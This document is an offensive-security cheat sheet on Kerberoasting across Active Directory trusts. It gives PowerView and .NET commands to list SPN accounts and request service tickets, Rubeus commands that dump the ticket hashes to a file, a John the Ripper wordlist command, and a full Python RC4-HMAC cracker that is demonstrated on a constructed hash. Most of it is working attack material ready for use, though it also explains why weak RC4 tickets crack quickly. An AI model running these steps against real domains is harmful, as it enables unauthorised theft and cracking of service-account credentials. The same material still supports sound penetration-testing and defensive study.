# kerberoast

## Methodology

1. Enumerate the user accounts with an SPN set (i.e. accounts running as service accounts) that we want to kerberoast.
2. Make sure the account is not a honeypot account.
3. Make sure it is a user-created account; skip machine accounts, since their passwords are long and random and will not crack.
4. Kerberoast the user account (request a TGS for its SPN).
5. Crack the ticket offline.

> \[!INFO] Across domain/forest trusts there is no need to use `/opsec`: trusts do not use AES256 by default, so no encryption downgrade is needed.

## PowerShell

> \[!INFO] Remember to follow the PowerShell methodology

### PowerView

**Find users that have an SPN set in trusted domains (here: trusts with SID filtering enabled):**

```powershell
# For every trust with the FILTER_SIDS attribute, list SPN-enabled users in the trusted domain
Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName}
```

**Request a TGS across trusts:**

```powershell
# Requesting a token for the SPN makes the OS fetch a service ticket for it,
# which then sits in the current logon session's ticket cache
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'MSSQLSvc/eu-file.eu.local@eu.local'
```

## Binaries

> \[!INFO] Remember to follow the Binaries methodology

### Rubeus

**Request a TGS across trusts (roast one user in the trusted domain and write the hash out):**

```batchfile
Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:euhashes.txt
```

**Check that the TGS is in the ticket cache:**

```batchfile
klist
```

### Ticket Crack

<https://www.openwall.com/john/k/john-1.9.0-jumbo-1-win64.zip>

**Using John**:

```batchfile
:: Rubeus /simple writes one $krb5tgs$23$... line per account; John auto-detects the
:: format (add --format=krb5tgs if it picks a different one)
john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=rockyou.txt euhashes.txt
```
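What John and hashcat actually do with a `$krb5tgs$23$` line is worth seeing once, because it explains steps 3 and 5 of the methodology: why RC4 (etype 23) tickets crack fast, and why a machine account's long random password is a waste of time. The following is an added example, not code from the page or from Rubeus/John: it implements the RC4-HMAC check from RFC 4757 (NT hash of the candidate, `K1 = HMAC-MD5(NT, usage 2)`, `K3 = HMAC-MD5(K1, checksum)`, RC4-decrypt, recompute the checksum) and runs it against a constructed hash. The ticket body, account names, realm and wordlist are all made up; `build_sample_hash` plays the KDC only so the example runs offline, and MD4 is implemented by hand because OpenSSL 3 builds of Python often disable it.

```python
import hashlib
import hmac
import os
import struct

M32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); needed because hashlib's md4 is often unavailable."""
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    def rol(x, s): return ((x << s) | (x >> (32 - s))) & M32
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", bytes(msg[off:off + 64]))
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rol((a + f(b, c, d) + x[i]) & M32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rol((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rol((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & M32, (b + bb) & M32, (c + cc) & M32, (d + dd) & M32
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is the account's RC4-HMAC (etype 23) Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


# RFC 4757 key usage 2: the encrypted part of the ticket in a TGS-REP, which is what Kerberoast captures.
KU_TGS_REP_TICKET = struct.pack("<I", 2)


def encrypt_ticket_part(password: str, plaintext: bytes):
    """KDC side of RC4-HMAC (RFC 4757); used here only to build a constructed sample hash."""
    k1 = hmac_md5(nt_hash(password), KU_TGS_REP_TICKET)
    confounded = os.urandom(8) + plaintext          # random 8-byte confounder per ticket
    checksum = hmac_md5(k1, confounded)
    k3 = hmac_md5(k1, checksum)
    return checksum, rc4(k3, confounded)


def build_sample_hash(user: str, realm: str, spn: str, password: str) -> str:
    """Constructed sample in the Rubeus/hashcat layout; the ticket body is fake, not ASN.1."""
    fake_ticket = b"constructed EncTicketPart, not a real ticket"
    checksum, edata = encrypt_ticket_part(password, fake_ticket)
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


def parse_krb5tgs(line: str) -> dict:
    """Parse $krb5tgs$<etype>$*user$realm$spn*$<checksum>$<edata>; split from the right so a
    trailing '$' in a machine account name does not break the fields."""
    if not line.startswith("$krb5tgs$"):
        raise ValueError("not a krb5tgs hash")
    _, _, etype, rest = line.split("$", 3)
    meta, rest = rest[1:].split("*$", 1)
    user, realm, spn = meta.rsplit("$", 2)
    checksum_hex, edata_hex = rest.split("$", 1)
    return {"etype": int(etype), "user": user, "realm": realm, "spn": spn,
            "checksum": bytes.fromhex(checksum_hex), "edata": bytes.fromhex(edata_hex)}


def candidate_matches(h: dict, password: str) -> bool:
    """The per-candidate check for etype 23: derive K1/K3, decrypt, recompute the checksum."""
    k1 = hmac_md5(nt_hash(password), KU_TGS_REP_TICKET)
    k3 = hmac_md5(k1, h["checksum"])
    plaintext = rc4(k3, h["edata"])                 # RC4 is symmetric
    return hmac.compare_digest(hmac_md5(k1, plaintext), h["checksum"])


def crack(line: str, wordlist):
    h = parse_krb5tgs(line)
    if h["etype"] != 23:
        # etype 17/18 (AES) use PBKDF2-derived keys: a different, much slower check
        raise ValueError(f"etype {h['etype']} not handled here")
    if h["user"].endswith("$"):
        return None                                 # methodology step 3: skip machine accounts
    for pw in wordlist:
        if candidate_matches(h, pw):
            return pw
    return None


if __name__ == "__main__":
    sample = build_sample_hash("storagesvc", "EU.LOCAL", "MSSQLSvc/eu-file.eu.local", "Summer2018!")
    print(crack(sample, ["Password1", "Winter2017", "Summer2018!"]))
```

Every candidate costs one MD4 plus three HMAC-MD5s and one RC4 pass, which is why an RC4 ticket for a weak service password falls to a wordlist in seconds; an AES ticket would need 4096 PBKDF2 iterations per candidate instead. The machine-account short circuit is deliberate: there is no wordlist for a 120-character random password.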
